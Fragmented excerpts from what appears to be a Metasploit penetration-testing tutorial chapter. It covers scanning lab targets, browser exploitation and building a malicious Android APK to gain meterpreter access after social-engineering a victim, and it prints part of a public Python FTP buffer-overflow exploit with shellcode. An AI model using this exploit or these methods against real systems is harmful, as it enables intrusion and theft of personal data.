Throughout this chapter and the following ones, we will primarily practice on Metasploitable 2 and Metasploitable 3 (intentionally vulnerable operating systems). Additionally, for the exercises which are not covered in Metasploitable distributions, we will use our customized environment:

Consider yourself performing a penetration test on a class B range IP network. Let's first add a new workspace for our test and switch to it, as shown in the following screenshot:

We added a new workspace by issuing the workspace command followed by the -a switch followed by the name of our new workspace. We switched our workspace to the one we just created by issuing the workspace command again followed by the name of the workspace, which, in our case is ClassBNetwork.

Throughout Chapter 2, Identifying and Scanning Targets, we used the tcp portscan auxiliary module heavily. Let's use it again and see what surprises we have on this network:

Nothing fancy! We merely have two open ports, that is, port 80 and port 22. Let's verify the information found in the scan by issuing the hosts command and the services command, as shown in the following screenshot:

We can see that the information captured in the scan now resides in Metasploit's database. However, we...

Web browsers are used primarily for surfing the Web. However, an outdated web browser can lead to the compromise of the entire system. Clients may never use the preinstalled web browser and choose the one based on their preference. However, the default preinstalled web browser can still lead to various attacks on the system. Exploiting a browser by finding vulnerabilities in the browser components is known as browser-based exploitation.

For more information on Firefox vulnerabilities, refer to http://www.cvedetails.com/product/3264/Mozilla-Firefox.html?vendor_id=452.

For Internet Explorer vulnerabilities, refer to http://www.cvedetails.com/product/9900/Microsoft-Internet-Explorer.html?vendor_id=26.

The Android platform can be attacked either by creating a simple APK file or by injecting the payload into an actual APK. We will cover the first one. Let us get started by generating an APK file with msfvenom as follows:

On generating the APK file, all we need to do is to either convince the victim (perform social engineering) to install the APK or physically gain access to the phone. Let us see what happens on the phone as soon as a victim downloads the malicious APK:

Once the download is complete, the user installs the file as follows:

Most people never notice what permissions an app asks for. Hence, an attacker gains full access to the phone and steals personal data. The preceding section lists the required permissions an application needs to operate correctly. Once the installation happens successfully, the attacker gains meterpreter access to the target phone as follows:

Whooaaa! We got the meterpreter access easily. Post-exploitation is widely covered...

In the upcoming example, we will see how we can import an exploit written in Python to Metasploit. The publicly available exploit can be downloaded from https://www.exploit-db.com/exploits/31255/. Let us analyze the exploit as follows:

import socket as s
from sys import argv
host = "127.0.0.1"
fuser = "anonymous"
fpass = "anonymous"
junk = '\x41' * 2008
espaddress = '\x72\x93\xab\x71'
nops = '\x90' * 10
shellcode= ("\xba\x1c\xb4\xa5\xac\xda\xda\xd9\x74\x24\xf4\x5b\x29\xc9\xb1"
"\x33\x31\x53\x12\x83\xeb\xfc\x03\x4f\xba\x47\x59\x93\x2a\x0e"
"\xa2\x6b\xab\x71\x2a\x8e\x9a\xa3\x48\xdb\x8f\x73\x1a\x89\x23"
"\xff\x4e\x39\xb7\x8d\x46\x4e\x70\x3b\xb1\x61\x81\x8d\x7d\x2d"
"\x41\x8f\x01\x2f\x96\x6f\x3b\xe0\xeb\x6e\x7c\x1c\x03\x22\xd5"
"\x6b\xb6\xd3\x52\x29\x0b\xd5\xb4\x26\x33\xad\xb1\xf8\xc0\x07"
"\xbb\x28\x78\x13\xf3\xd0\xf2\x7b\x24\xe1\xd7\x9f\x18\xa8\x5c"
"\x6b\xea\x2b\xb5\xa5\x13\x1a\xf9\x6a\x2a\x93\xf4\x73\x6a\x13"
"\xe7\x01\x80\x60\x9a\x11\x53\x1b\x40\x97\x46...

Well, you learned a lot in this chapter, and you will have to research a lot before moving onto the next chapters. We covered various types of applications in this chapter and successfully managed to exploit them as well. We saw how db_nmap stores result in the database, which helps us segregate the data. We saw how vulnerable applications such as Desktop Central 9 could be exploited. We also covered applications that were tough to exploit, and gaining access to their credentials led to obtaining system-level access. We saw how we could exploit an FTP service and gain better control with extended features. Next, we saw how vulnerable browsers and malicious Android applications could lead to the compromise of the system using client-side exploitation. Finally, we looked at how we can convert an exploit to a Metasploit-compatible one.

This chapter was a fast-paced chapter; for you to keep up at speed, you must research and hone your skills on exploit research, various...